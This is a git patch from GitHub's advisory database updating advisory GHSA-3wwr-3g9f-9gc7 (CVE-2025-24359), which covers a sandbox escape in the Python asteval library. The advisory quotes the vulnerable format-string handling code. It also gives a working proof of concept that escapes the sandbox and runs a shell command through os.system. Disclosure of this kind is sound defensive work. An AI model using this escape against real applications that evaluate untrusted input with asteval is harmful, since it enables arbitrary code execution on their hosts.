From 6d5923c66a568e2bc343244ae2167466e6a8d056 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 25 Jan 2025 00:56:36 +0000 Subject: [PATCH] Publish GHSA-3wwr-3g9f-9gc7 --- .../2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json b/advisories/github-reviewed/2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json index 7fa3f8b8b75..1fb7b36af7a 100644 --- a/advisories/github-reviewed/2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json +++ b/advisories/github-reviewed/2025/01/GHSA-3wwr-3g9f-9gc7/GHSA-3wwr-3g9f-9gc7.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-3wwr-3g9f-9gc7", - "modified": "2025-01-24T18:45:30Z", + "modified": "2025-01-25T00:54:49Z", "published": "2025-01-24T18:45:30Z", "aliases": [ "CVE-2025-24359" ], - "summary": "ASTEVAL Allows Maliciously Crafted Format Strings Lead to Sandbox Escape", + "summary": "ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape", "details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')\n \"formatting used in f-strings\"\n val = self.run(node.value)\n fstring_converters = {115: str, 114: repr, 97: ascii}\n if node.conversion in fstring_converters:\n val = fstring_converters[node.conversion](val)\n fmt = '{__fstring__}'\n if node.format_spec is not None:\n fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'\n return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n# ga\n \ndef pwn():\n try:\n f\"{dict.mro()[1]:'\\\\x7B__fstring__.__getattribute__.s\\\\x7D'}\"\n except Exception as ga:\n ga = ga.obj\n sub = ga(dict.mro()[1],\"__subclasses__\")()\n importer = None\n for i in sub:\n if \"BuiltinImporter\" in str(i):\n importer = i.load_module\n break\n os = importer(\"os\")\n os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n \npwn()\n\"\"\"\naeval(code)\n\n```", "severity": [ {